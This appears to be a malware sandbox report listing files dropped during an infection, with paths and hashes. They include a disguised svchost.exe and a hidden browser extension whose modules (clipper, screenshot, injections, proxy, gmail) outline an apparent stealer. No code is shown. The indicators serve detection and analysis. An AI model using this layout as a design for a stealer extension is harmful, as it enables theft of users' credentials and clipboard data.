memory/224-88-0x0000000008060000-0x0000000008604000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scrEFB6.ps1

MD5 753240f3d0c58563dcba1244db69b0d7
SHA1 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256 e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

memory/224-90-0x00000000087E0000-0x00000000089A2000-memory.dmp

memory/224-91-0x0000000008EE0000-0x000000000940C000-memory.dmp

memory/224-95-0x0000000072FD0000-0x0000000073780000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\msiEFB5.txt

MD5 eb0046beb949b23b97dccd59c4b8f131
SHA1 c084a9c15a323cd51d24122681a494e52577487f
SHA256 b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

C:\Windows\Installer\e59d315.msi

MD5 9068f6d9bb1f01026f24c0c4204ee754
SHA1 3cf3d823e27bd8e6ed83b7932fc8f963a92b9ae0
SHA256 981a03ee5ca30de8489f5dabd9741633f5d462e1123bfe201872df191e907058
SHA512 3b6c0c8892153a8394afa1ad21d50cb7681d81b2582bbd445a532cfbd09c2fb486f10a763d11c8b09b9431b5b4ac22f12e74c67ff9f6ae844e7b97a26a79c9a0

C:\Config.Msi\e59d318.rbs

MD5 d4cd632952e3afae363580c5b45ce0ce
SHA1 b02e082d79b14375555e3fe50f5ba7b78f0be348
SHA256 6c2409d240e92a2e298681b09d291d2418da9133e1afb96c5dc78fe9cedf433a
SHA512 5ba59ebf0bd65913f40f07fe5c4cbd8b04cf618a5e5daa9ea40634ba80b0edd75827e3e7c9d5327ff6f34a33244250447a88b98a4effdcd545e07e382175b857

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe

MD5 35365d3713500bde4e2e1422c54f04fa
SHA1 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libassuan-0.dll

MD5 a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1 a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256 e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512 b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\zlib1.dll

MD5 8f4cdaed2399204619310cd76fd11056
SHA1 0f06ef5acde4f1e99a12cfc8489c1163dba910d1
SHA256 df14c4dcb9793a1298c3ef531299479c8bea32a9e8124355e6d3ba6b15416213
SHA512 3d1e0453f10bece7b65fee3806bce9e36e2c526daa72d66774ed47684a591a978a80894b1643709e76db0adcf6f2dca189aa6413786a9b70c742ceaeec5b80dc

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libsqlite3-0.dll

MD5 0381964390751461a5d79d26ca7cedaa
SHA1 3b17b9dca5060f9b22920737165a6bd1de5e8941
SHA256 7b307806698bfe2b8a81cf0d04cfd0df4a9916cba30707ce3934b9ee06bd75da
SHA512 381e6c2d49016ca2c4435526eb2ac4997f0c43c9bbe3ce56bc0ade3b5cc14677101c1297bbf2a10cec16242124a9246ca5e46003512719dc8360af007fb79b05

memory/4644-190-0x00000000007B0000-0x00000000007B1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libnpth-0.dll

MD5 b7b148054a2818699d93f96139b4d0d0
SHA1 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgpg-error-0.dll

MD5 72498f59c8c580707a0a3839c332f51b
SHA1 fb09b912912610d243066cc8b71435f689e6a449
SHA256 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

memory/4644-192-0x00000000007E0000-0x0000000000805000-memory.dmp

C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\libgcrypt-20.dll

MD5 aa26817666196ab6124306f153510196
SHA1 4e04d73cc0136d8fc5a2d021fa60372352f3de44
SHA256 4e28b376b164840e9104d38b57d71826e5ea945c700e951b1317906efd4c36b5
SHA512 e49d7428c13daf7f0026eeef932e8a1f7b8013b2361333e690a30fedb0e043038311e72cfa92cc50828eec0b6881efef85c754c660955a76fd08ec9861d5210d

memory/3400-194-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3400-195-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/3400-196-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4644-197-0x0000000000400000-0x000000000054C000-memory.dmp

memory/4644-199-0x0000000065A80000-0x0000000065AAA000-memory.dmp

memory/4644-201-0x000000006A800000-0x000000006A80F000-memory.dmp

memory/4644-200-0x000000006B480000-0x000000006B4C1000-memory.dmp

memory/3400-198-0x00000000000E0000-0x0000000000108000-memory.dmp

memory/4644-202-0x0000000066580000-0x00000000666AA000-memory.dmp

memory/4644-203-0x0000000063080000-0x00000000630A9000-memory.dmp

memory/720-206-0x0000016C22D80000-0x0000016C22DA2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bcbd743eaed3394be4983a623649c089
SHA1 2a5ed701863ea4eea112dfb5a725644cf53491b0
SHA256 c4537ef901e030a6ef3a9e8b4d8bb4d2fbfbc794ca2dee20f6316bbf97cd3d5c
SHA512 6927e4a6fc512f4723e7968add233688fdf212306674fea4c473c82adf7669f3c0c20399cd5c9652bfba689a13f0ed25e5897be28924107eae77d0531536b95a

memory/720-217-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

memory/720-218-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

memory/720-219-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

memory/720-220-0x0000016C22BD0000-0x0000016C22BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hyayJVO3XOEo3m1\svchost.exe

MD5 a9c5924063a253f64fb86bc924be6996
SHA1 c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256 eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

memory/720-240-0x0000016C23030000-0x0000016C2304C000-memory.dmp

memory/720-268-0x0000016C23490000-0x0000016C23652000-memory.dmp

memory/720-269-0x0000016C23B90000-0x0000016C240B8000-memory.dmp

memory/720-283-0x00007FF89F8C0000-0x00007FF8A0381000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 181630975fcbb9a2f398f18a0d2a008d
SHA1 c1cea6140e542decd77c91f4ff203a01f1c124d1
SHA256 590d8b42e9919ecec00177a9deaba84285bde1aa51bfd95036b62f9e3aa90db1
SHA512 4416f528b123099e5e4eae4bac9540a3fe1481925ffe3a81421b42d715696ae08b82323f8d38beff57d2b2b580aabc72e43db12e2f590fbe68279ab367bc2622

memory/3400-298-0x0000000000C10000-0x0000000000D10000-memory.dmp

memory/3400-299-0x0000000003BD0000-0x0000000003C58000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 98839119e51c0c08fe847217f8bba847
SHA1 37bbf0e28d34b73f49d70bc92444b3b069af9353
SHA256 32d9db13268428916788ae6766f62084432bab473f12dc23f7c03a71192663d9
SHA512 8de1280e56257ccc2730d3d36cf7eeb7cfef37a575481c346a4969ec6810f89f701a4725f4b09af152ab2cdb2f403cba1de23b86d48f35117234c2e3de3df1f5

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\ico.png

MD5 40de419c81de274c26c63e0f23d91a3f
SHA1 3fda2c10bf0d84aa327e107730b3596fcd13d4fd
SHA256 7d1878c4a74f2b7c6deb2efb39aa4c1cef86b8792efd2022644437cad6c48af3
SHA512 a6c0a9328941b31ab92d7de6bfedb7012a66e10f1726a3648d8314a49fd37dfbed06c199db04ddf6a0da6f9d42d9a78378ea67e7399fd847d48e4427bbb0ff99

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\mails\gmail.js

MD5 91fa3e1f56477c9c742012da1b862cd3
SHA1 4d5768220b6ec11e83611eb87875c0159df52118
SHA256 84a4795f7893cd3f5c711016ec1290e6e3e517a84ca37c1fc59f39c84cf05767
SHA512 05950accba7a74a00a8777950690f5b83926e6e6d65bfaf4aff1cc2f4d2eb9ab3b083112cf807f5e0088d5d54e3c0588264ea3fd71a2b27e84b4232bca9157ef

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\content\main.js

MD5 02bb5c3cf4607f6757520a356ed5f809
SHA1 896d19dc3aecfdf887345619281d49ec60748b22
SHA256 c608c392b7df42bfa4e8b44a3c1f1b4dd5539bdc13109954381c8895db0e97a1
SHA512 47bdb38a500a87a7d9a575a684ece011f5c3e8baf7168b29482ababdd72b6124aebc38d6bc3893c49637357dcb2e14bb8ee2adf632e9777bffc2cccec6359866

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\manifest.json

MD5 5f0908db2929344266e44e98c4b967b5
SHA1 68fa7988a9fc9b8116fa042fb58a6319580f23ac
SHA256 11dbcdb137654ecf047eabd22e0cc6b871c4ef030a8557fdcdbd48c2f105b723
SHA512 a37fc8c6d2bce7c36aa1854db07ddb23f40aa45627e28be10d8ab3357447b590c2bce9f81454570ca830ca67af27a41164322fb6f3e6bd8eb52431e2d00f04f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 8994dca438d2a22b9fe22f4d8c87de77
SHA1 3ae53bf1463ce656e026359935e1282434fc524e
SHA256 f86e4e4ed48f9f0e9dd52ec89e151a32a900b471cab102bffb2bc63433d3d0f3
SHA512 9ed6388643dc97f5b729dae131d978395605d37f40b6dd1e86b4c55909b9c1ab32ebc21e5352344f1904ad7c44325a53299ee276b223be755d4933ddf8045e1b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 48f7e0d082a51ad77bd58d3f190faab9
SHA1 5c4c7e41804c104ca43e0ca3bd669934a03a0238
SHA256 f68673f9e357042d2823dc85ac144cf2e3d3843c452d001ad2023a90d1a015ad
SHA512 95420d2780bdd3c53e9a1e35401e59ce3e9d25512f20a41b8064a10ec0dbfe521c997243e086fb4e9f43cdd3a70ab33b4e8d66d878e5b01b435f01af0b4f7ff1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 cf9ca130d859672477262d68d75c5aad
SHA1 6b4b1d96a055df2613484c6e79b20b42de1011c0
SHA256 8f56e6527caf02d77dce5aca498a66a42d731f437cc47341728c05d1eb91d130
SHA512 f82377ff3f0e32982ce04c4a460a45d621060485cff49edad7980a68fb95a70f16543c258b47365aa7fdb51fe1c8fe9bd2d933e8519e1f1dda6d012bc56df22c

\??\pipe\crashpad_1472_DIPVJTSKJMDMYJWM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\background.js

MD5 74e613e741449c83ac195b89fa584091
SHA1 9eb52b87c35576fb0707be6a3ba4636f2cedf577
SHA256 589a7ffba46286eb62bab2975206d94b217d4b473e0c6e4998d3cf875189716e
SHA512 4e15929e72125af7fd3c5640c24918ca573f7c2a5fd1992c6bfab69f78f951a40db4532b10645c66be312b38b2491829464758db6abdb0ba40252cf8fa85cb5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/3400-357-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-358-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-359-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-366-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3400-365-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

memory/3400-372-0x0000000077080000-0x0000000077295000-memory.dmp

memory/3844-373-0x0000000000A90000-0x0000000000A99000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

MD5 b6f7a6b03164d4bf8e3531a5cf721d30
SHA1 a2134120d4712c7c629cdceef9de6d6e48ca13fa
SHA256 3d6f3f8f1456d7ce78dd9dfa8187318b38e731a658e513f561ee178766e74d39
SHA512 4b473f45a5d45d420483ea1d9e93047794884f26781bbfe5370a554d260e80ad462e7eeb74d16025774935c3a80cbb2fd1293941ee3d7b64045b791b365f2b63

memory/3844-389-0x0000000002760000-0x0000000002B60000-memory.dmp

memory/3400-390-0x0000000003BD0000-0x0000000003C58000-memory.dmp

memory/3844-391-0x0000000002760000-0x0000000002B60000-memory.dmp

memory/3400-392-0x0000000004DB0000-0x00000000051B0000-memory.dmp

memory/3844-393-0x00007FF8C1A10000-0x00007FF8C1C05000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jnbdookjaigdccccilhfnijmckgmolhf\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

memory/3844-401-0x0000000077080000-0x0000000077295000-memory.dmp

memory/3844-394-0x0000000002760000-0x0000000002B60000-memory.dmp

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\getMachineInfo.js

MD5 b8749f5669e5b61eff9d2636d64c7395
SHA1 9be21dcf99ad1c22b276cc0ac62a9ad05d09af5f
SHA256 b9868080ce91445034c3f90da4e8a3f126384bd235408ab996767804c5e1ccfb
SHA512 72ba034462e112ea88fec3f4a2532fb7cb949e42e431de8be55b8a37bb5bc184679f59e177d9f162e4b8d7acf8a55cd67014b46e09de442853a75f0935960eb7

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\exchangeSettings.js

MD5 ed2384585afe2026230dab9e503d75d6
SHA1 f50f6f426fbe3f7609e2ab65835a538b064d608d
SHA256 06d1ca3c3fe0d82b1a75dd6a97dae45e944fd98091e76887adc7f12fbfe46949
SHA512 4cffc3c02cb4406021fd45b1d8d2c03b8657b28fe8ee4782b7f1fcc9717975fa83993d8f000647a4f46ae397f73492c9475bf57e1a0896a32d2eb8e074715e2c

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\settings.js

MD5 4075373edbef7c32f49668cf71d0a0f0
SHA1 46bc8492b8b5070529578a51d9f1e652de877dc4
SHA256 2683ef8ce60567bdf4ff80ba343abbbc263d4b57fd7e7d25f362d3b19ccadbcf
SHA512 a57cbb030663ad2d5ab7ce9ee2c730ad3efe8518622f1724ffa9c4c6f69da1952966d332d001d2a890ef3503065e66d4bd58fcaa582fb4f789dbfd34a9ac03b0

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshotRules.js

MD5 ebb088b2b3fd11c7f4c40006f7546a5e
SHA1 9ef92b7bf483f00717633561484caeb13bc0459a
SHA256 c4c7940136425b33ce5f69a72942d4bbf44b3699253c4f8caec344a7fe5f171c
SHA512 8cae952e5aaf71038eebf52a776e331f200db8ecc41a78624558bbfb769b0466d517b942e5ff7a441f0076844ea5ca327532cda5ed639c8f977df491e87d122b

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\screenshot.js

MD5 83e3e0934b07648eaff869a880f8e8d2
SHA1 5bde733355987b0cafa00606095c0ed3d4aef9c9
SHA256 d724c92845f92b8d882a31f17b7094f4815e99f5a5f32b7aed6ad15f3d3a8b5e
SHA512 25cada6dfe9fbad91041d0332dc967055f4ad5b4e325856af7a1beec6d87c729d1a562811798b82ff4315b42b059f7f2bec9d6e406fee70c68c92f833f98b4f3

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\domain.js

MD5 ea1275ea08c1ace2c12df7b1fbdc9ec6
SHA1 07823f2461d63842b1a40eb00f1d31af96d435ac
SHA256 f6871787558819998607f6f3ac0e3e5c0178e7fd451a8551430a77b140e0ee14
SHA512 d4f9de5398e52ccb62eaa08a5aa1acfbb0db792bd90575443d9ec98cd844b58de67b853c54457116311e4f6a20afc3ce22106bf396a05726be6f8fd76fe79f20

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\clipper.js

MD5 084c3ee93e6c89e5ab2fe1a830690631
SHA1 1e7366d273af950fab9731465c5cd12e3d153c49
SHA256 6f3360051868743b10f4ed348933d70f22a9574b970e28d988d5adeef4d71272
SHA512 9449088cc6f6d2afe557120ea0d8387662811f85115676f799ca06a64aee9f6b77f46edf987409a535122ab72ad1b40d000bde1821949c50145b6d8ab8aeb8e3

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\proxy.js

MD5 787a9cf08831c7d8aec4e5961cd4efa5
SHA1 e073fa3d89517dfe5f7b748a1e47c1b23f335031
SHA256 cf3fccbfc894657bc67d36821b1d3bcf924fd7ec101886ad9e60486ec1c51c7f
SHA512 f8b365fe7a68b4ed60e30c3e7a91b9533e863cd1652d8413ee60af63218186606bc5b9ab4aa15cc6e4c0bc69b1394d8aae1cec63997ece6c53ff74f05ae98781

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\csp.js

MD5 d4bc31826fea86f7d59629f234beb7af
SHA1 c9acb597c3daab33ae28ba79d78214e3868f7dfb
SHA256 3d719ce7728f5f727ccb3c8e1eabea3ad9e3744c5e9aa167a6938992d3065fc0
SHA512 fefd778cacd10328c8aec81f21eea8ea7bc10be3cbe3eeebb807d156280296d06ba2f5dec57a84bd1ddf1aacb1f6a07eff9d332a294f5d4591d5de324c5098fb

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\injections.js

MD5 7b23161290f67ff5c324269c998d5eaa
SHA1 224066999404170bd05a7ce7db081a29c9fc33f4
SHA256 e668570f5b5644cbdc25cc9d03fa9bad96d792cb0adf7f6cd95887f144a6d05e
SHA512 8ce5f7bcddc4b669c67d13405aee542555bacf72c380bc2fedf8924bd1fa4977c58c48d69885f795fa21120c5e74401cd11446f52c1caf156c18b01754d308b1

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\tabs.js

MD5 6b14682af71d2704652b5696ec171503
SHA1 bed9d09586eb0a36b4b0a5c94f58ad396b0ec4d8
SHA256 64230c97f0c3a41a00f2870ddf43c7395de5b2f670fd86defe9ed3c38a98cf41
SHA512 ebf1b684f1d1e88df84eadfc9f5e5b05c2de808b11a735c4fcc7e5eab18a0d1acaa8981dbe245de693c6565bb7e678ea9dd35af90dad68f64d2b6f0fef393598

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\config.js

MD5 a878ecacf4dc4aab506c9a254820c0b6
SHA1 39879f934be94420b44958de255656076868e471
SHA256 4af3507947e78a2513c700e292b97b86315b9cc09452dd06613c75e2e2785d12
SHA512 8c1ea24f3304c22c3fdaf470013cf16ba46e5509a8ca7b6fcd2483407301a7823d9285a7e78ec1ce1157145c2fe3bb3c5f3cf236e4edeba887a8666a1bd3867f

C:\Users\Admin\AppData\Local\$jN1J$s4tqb\src\functions\notifications.js

MD5 c3e86f0f429df23fdc99412ec7cb5ec5
SHA1 beb75283be1c64058659b96a8ed09ef8de86e1de
SHA256 f6bb14e081ec4f795faccec11ad6fd7fc4766c7fe9260fc72a9fdfadec8ec252
SHA512 9d606f87558450d6a48211ed8a7623968843f2b60d3d23d6934f767cf8a601e8e0faa41d5110967c99e671318b3bb62c7d0a898a7db7cbe596bca05b4fbd6190

memory/3844-461-0x0000000002760000-0x0000000002B60000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 319a6e936ea99a79ed12f245f4036963
SHA1 54e1ab2a2c2a6a90861bb1d949a25379ee2ee2f7
SHA256 2cb9cbe5cb69a689ee5ae0fb10cd84de8c074d2712547549062b07cd54965498
SHA512 e15fa5ae33c44d4e44646d745b19ebc25a4103b1252320c1d5f27a7da9644e16768476625bfbdef145986c775c7367085205e14107e30e980476d0ed803e4250

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 489b769a1a9d09a9a703bd96a7b5c21f
SHA1 97a0991976fa10af8b5b8ce073d9d965c3c13494
SHA256 4957d4d63830b470304cd9ba4a0b741cdc6d0eeadcf89f6bd9649220646aecd7
SHA512 262f1e3dfca3d1d76e2f784ff737213fee9dabdcde72637c9a6b15bc79ade920ee10308ab0936ad105aab3f525d591ea952c5371592272f7516b26f7dd431aa3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 1a5073af3482804f9040b8cba135d5d4
SHA1 900ad2e4934c8257b968993c6d0ec87c325112fb
SHA256 148629523707b00b5c4e069e7250dbf5d8992df982cd5ead77dc693ae1837511
SHA512 3705697ced4a4cf088d941da4ce962fc4cbc2a191cf6637783b9e986b444f54ebb92d631787c52bf7c577d5bbb3051435503a961ded32d1fb4ef79cb4b0f63cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 5123ade7a73f8adcc69dcb72fdaae1ac
SHA1 cf089058a4034ba0e2de7047d2bb963c08dffab3
SHA256 62fd354db499ae4e64c25906cfc01c0d0a3498263471e3c24c2744e35aede79f
SHA512 c0a9c55df12a179907f2f0ad6b8c68d9d867258d59fbdf2a5b31c1a423f022b67a24ee66e920dcc6e7bfc110894d4689b5f6ed1f045e7b912bba1fe3e6cf75bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 9b71f176a47cff09137223b0244e2805
SHA1 c22d347c48b1857ae6297a4070c723c90f49b4f5
SHA256 91def744fc82ae05f8120e486feb0b4ed777ccdfc8ad71ec5131324323b1b838
SHA512 e00dfb23a04652bac312e2daf50138e79c1d9ead424be44e8263ab36b46c2e7802a833abd44062a6650690d319b6d9f2a4bf429d8aa059a28c53fa4a973bb6f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 7d8b03404e2e89b0b6eb68349917bbcd
SHA1 07d5524ee044bc0e9102398af605323c74013f50
SHA256 e35190f8838fbae157ab1ef63baf7bdf9e2fd4ae7b179f581c471faf3058b156
SHA512 f15c9cff49550b976e8a733b9cc79241a2e2d0e7ecb9512989994cad058481171847af413f097c3cc0418d5e32ec71041a8c1a8037fe9f4814fe957b9ecd18d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b0c03.TMP

MD5 489f0dfbc6d01667889d4432be55c86d
SHA1 31fd85677df73a54c71383a542ff448a90452fa4
SHA256 31e5fe7ee32919adc981e54f41b772341ee9023996f7110131d56989ab6bea33
SHA512 74f3bd1c0f9ecdbd24c052b4832789b26554e38a6a448317af2df0ae13617faf2c2ec2b485cfb8bd80514e519de9f03ff065f392d265c4e430480ff2f862617c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 5524cba301c140331a1a2a2f7904be31
SHA1 73e4385dd1809c6bb527da4666323d31b715b45d
SHA256 3391c8c88e244b0463fab1a1f7772477307832752e25f5a7df51f7a2e0dde912
SHA512 fe194adc4778ab4658b160b4d18a3329551009649e32dea036f50e2942d4f276267348d261246bb5c020886820a865d7c68c59aa069021d4c5f6288bb6830e18

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 ab67e4770d689320881eeefd1f8ded07
SHA1 eb157c84187f6930a9060e4ac73dbe52bf73c8ff
SHA256 0377d4e9b609669d284576c9777a138a0c54fc89b3672d8869ac248fb99c579c
SHA512 2b141138a77dfedef4650225ffa6ebeb376d3f747e1b8e00365b671a9da45191b9af9da56af941f62b0140e08eb4930af38e2fc900b1d865c3abe32cfbc920b7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Temp\269d6cb3-50e7-48b4-b9cd-93590fa10ce5.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 7bcd0bea14fd7cf240db2b923760999e
SHA1 153359f9df51485f259b34bde05a7dc91744d826
SHA256 969c143f5d7cca340ef7a3356d7651c2f2edee9592cc3ea2721b810abadd6c11
SHA512 9ba63ac297f93c657626739258cee2912c584cfca2b3655da73d7b5aff53bf925022b333fcf5f292a9aec72148733f06235fa5790ced36ad8a8eeb527fa012d4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 2597485e05dd1471d7119777b2a92666
SHA1 f1116746587b94222dc2b1c81bdaea3f443cdbff
SHA256 d128d60491fed723df4047ba57e1a9fbdcffca5f085f2a14e1fd7c0bfc63fc9e
SHA512 e3adbb408b61048f6be75b0dd7db09d3db85d9e726a515fc09aae052f872335e9da97a4fc5202135e1b270711ca244481dd52c5870db3efa312eafa1a6f35a7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 b0f6eb97dee086c9e180067a064862c0
SHA1 accf4fdc9a88769369051e9ee0a7b2c723ec3f25
SHA256 b8bb0db75c84f0d8e4a03179c80dd7a8009d3997b6cf47daf0673b9075ee0826
SHA512 b18933491a9abb02fc39cdc72213e82b2f02329cccf4464062d857e6ab7325ead50e8cc204e7a76934b1574ec494dc9a650e247ea1b1953da2c87674747cfaa9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6ba87141618efbb3ecbe57f1bf47b700
SHA1 aee29e69ca09cd1db5592a54fabceb40f91d1822
SHA256 f6e68f3e58108b5c89a293f9a7865c5ee357cb805c0ab4b1ebf085baf3cbfc68
SHA512 093538e946a1b2d5e61c303274b188518c0cb356566189eea30f2e2cb8a66d2dc8c970735032539e4e88643e8e8dd0220390f7c8ad6f584e2ddc84237bdd316d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity

MD5 a44730a821e1b97724f134595ebf425c
SHA1 c1c0681b3fe825727ab8e3b89e85f4409ec1db58
SHA256 659f24408fe7a00d1defac879ee821cca25d1a3c9deaf005068a5218fb0df06f
